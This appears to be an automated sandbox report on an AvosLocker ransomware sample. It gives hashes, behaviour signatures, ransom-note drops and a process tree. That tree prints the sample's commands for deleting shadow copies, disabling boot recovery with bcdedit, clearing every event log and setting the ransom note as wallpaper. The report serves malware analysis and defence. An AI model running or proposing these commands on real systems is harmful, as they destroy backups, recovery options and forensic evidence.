Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 13:33
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
Resource
win7-20240221-en
windows7-x64
14 signatures
150 seconds
Behavioral task
behavioral2
Sample
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
Resource
win10v2004-20240508-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
-
Size
1002KB
-
MD5
7152fd25b0f11276a5bc19f2ccce5e75
-
SHA1
cba080861ab44809569f743a5aef581c0867938e
-
SHA256
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b
-
SHA512
503f0343838c062896ac5d27abfa681ac3e54db05dce691b23327d2f249430a992bb5eba85692fe41b3c09ce65df3ed089d3bd281f41a541bc798a8f10ca7016
-
SSDEEP
24576:G0XiZc8dyQNFphp8YPeM8LNKW3jGY+zSvxJcYq:7+NTXGM8LNF3jDQSoYq
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 1900 bcdedit.exe 2292 bcdedit.exe -
Renames multiple (10371) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exedescription ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exedescription ioc Process File opened (read-only) \??\Z: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1172194971.png" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exedescription ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01158_.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\gadget.xml 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR00.GIF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7F.GIF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\WMPDMCCore.dll.mui 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WCOMP98.POC 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01357_.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV_K_COL.HXK 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\cpu.html 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\picturePuzzle.html 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL095.XML 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files (x86)\Common Files\System\ado\it-IT\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PG_INDEX.XML 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONINTL.DLL.IDX_DLL 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00166_.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN089.XML 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\GET_YOUR_FILES_BACK.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01740_.GIF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OLKIRM.XML 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe -
Processes:
powershell.exepowershell.exepid Process 2364 powershell.exe 1296 powershell.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 2352 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exepowershell.exepowershell.exepid Process 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 2364 powershell.exe 1296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exeWMIC.exepowershell.exevssvc.exedescription pid Process Token: SeTakeOwnershipPrivilege 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe Token: SeIncreaseQuotaPrivilege 2312 WMIC.exe Token: SeSecurityPrivilege 2312 WMIC.exe Token: SeTakeOwnershipPrivilege 2312 WMIC.exe Token: SeLoadDriverPrivilege 2312 WMIC.exe Token: SeSystemProfilePrivilege 2312 WMIC.exe Token: SeSystemtimePrivilege 2312 WMIC.exe Token: SeProfSingleProcessPrivilege 2312 WMIC.exe Token: SeIncBasePriorityPrivilege 2312 WMIC.exe Token: SeCreatePagefilePrivilege 2312 WMIC.exe Token: SeBackupPrivilege 2312 WMIC.exe Token: SeRestorePrivilege 2312 WMIC.exe Token: SeShutdownPrivilege 2312 WMIC.exe Token: SeDebugPrivilege 2312 WMIC.exe Token: SeSystemEnvironmentPrivilege 2312 WMIC.exe Token: SeRemoteShutdownPrivilege 2312 WMIC.exe Token: SeUndockPrivilege 2312 WMIC.exe Token: SeManageVolumePrivilege 2312 WMIC.exe Token: 33 2312 WMIC.exe Token: 34 2312 WMIC.exe Token: 35 2312 WMIC.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2236 vssvc.exe Token: SeIncreaseQuotaPrivilege 2312 WMIC.exe Token: SeSecurityPrivilege 2312 WMIC.exe Token: SeTakeOwnershipPrivilege 2312 WMIC.exe Token: SeLoadDriverPrivilege 2312 WMIC.exe Token: SeSystemProfilePrivilege 2312 WMIC.exe Token: SeSystemtimePrivilege 2312 WMIC.exe Token: SeProfSingleProcessPrivilege 2312 WMIC.exe Token: SeIncBasePriorityPrivilege 2312 WMIC.exe Token: SeCreatePagefilePrivilege 2312 WMIC.exe Token: SeBackupPrivilege 2312 WMIC.exe Token: SeRestorePrivilege 2312 WMIC.exe Token: SeShutdownPrivilege 2312 WMIC.exe Token: SeDebugPrivilege 2312 WMIC.exe Token: SeSystemEnvironmentPrivilege 2312 WMIC.exe Token: SeRemoteShutdownPrivilege 2312 WMIC.exe Token: SeUndockPrivilege 2312 WMIC.exe Token: SeManageVolumePrivilege 2312 WMIC.exe Token: 33 2312 WMIC.exe Token: 34 2312 WMIC.exe Token: 35 2312 WMIC.exe Token: SeRestorePrivilege 2236 vssvc.exe Token: SeAuditPrivilege 2236 vssvc.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe Token: SeBackupPrivilege 2364 powershell.exe Token: SeSecurityPrivilege 2364 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.execmd.execmd.execmd.execmd.execmd.exepowershell.exedescription pid Process procid_target PID 1252 wrote to memory of 1724 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 29 PID 1252 wrote to memory of 1724 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 29 PID 1252 wrote to memory of 1724 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 29 PID 1252 wrote to memory of 1724 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 29 PID 1252 wrote to memory of 1100 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 30 PID 1252 wrote to memory of 1100 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 30 PID 1252 wrote to memory of 1100 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 30 PID 1252 wrote to memory of 1100 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 30 PID 1252 wrote to memory of 1068 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 31 PID 1252 wrote to memory of 1068 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 31 PID 1252 wrote to memory of 1068 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 31 PID 1252 wrote to memory of 1068 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 31 PID 1252 wrote to memory of 2460 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 32 PID 1252 wrote to memory of 2460 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 32 PID 1252 wrote to memory of 2460 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 32 PID 1252 wrote to memory of 2460 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 32 PID 1252 wrote to memory of 2564 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 33 PID 1252 wrote to memory of 2564 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 33 PID 1252 wrote to memory of 2564 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 33 PID 1252 wrote to memory of 2564 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 33 PID 1100 wrote to memory of 2352 1100 cmd.exe 34 PID 1100 wrote to memory of 2352 1100 cmd.exe 34 PID 1100 wrote to memory of 2352 1100 cmd.exe 34 PID 2460 wrote to memory of 1900 2460 cmd.exe 35 PID 2460 wrote to memory of 1900 2460 cmd.exe 35 PID 2460 wrote to memory of 1900 2460 cmd.exe 35 PID 1724 wrote to memory of 2312 1724 cmd.exe 36 PID 1724 wrote to memory of 2312 1724 cmd.exe 36 PID 1724 wrote to memory of 2312 1724 cmd.exe 36 PID 1068 wrote to memory of 2292 1068 cmd.exe 37 PID 1068 wrote to memory of 2292 1068 cmd.exe 37 PID 1068 wrote to memory of 2292 1068 cmd.exe 37 PID 2564 wrote to memory of 2364 2564 cmd.exe 38 PID 2564 wrote to memory of 2364 2564 cmd.exe 38 PID 2564 wrote to memory of 2364 2564 cmd.exe 38 PID 1252 wrote to memory of 1296 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 45 PID 1252 wrote to memory of 1296 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 45 PID 1252 wrote to memory of 1296 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 45 PID 1252 wrote to memory of 1296 1252 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe 45 PID 1296 wrote to memory of 224 1296 powershell.exe 46 PID 1296 wrote to memory of 224 1296 powershell.exe 46 PID 1296 wrote to memory of 224 1296 powershell.exe 46 PID 1296 wrote to memory of 3536 1296 powershell.exe 47 PID 1296 wrote to memory of 3536 1296 powershell.exe 47 PID 1296 wrote to memory of 3536 1296 powershell.exe 47 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe"C:\Users\Admin\AppData\Local\Temp\05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2352
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2292
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1900
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1172194971.png /f3⤵
- Sets desktop wallpaper using registry
PID:224
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False3⤵PID:3536
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53291f54f33ef903dc784d3a5a0662a39
SHA12713596bb41a53cbaf004493f870e8728790419b
SHA256e7717c0d1ec1f106533f367496f548d6a9240f98e80808c545357237c1cbf1fa
SHA512af89c0db49ab333764d112550e494216681e25537eaddf5e07176c1ab4d0f8f353597794167fa8410ee78df42e896ea1ee90514b064b59bc2e117a17c763353e
-
Filesize
1011B
MD501188d22b1675e3437b1418e14f4ffab
SHA16e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA5126903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e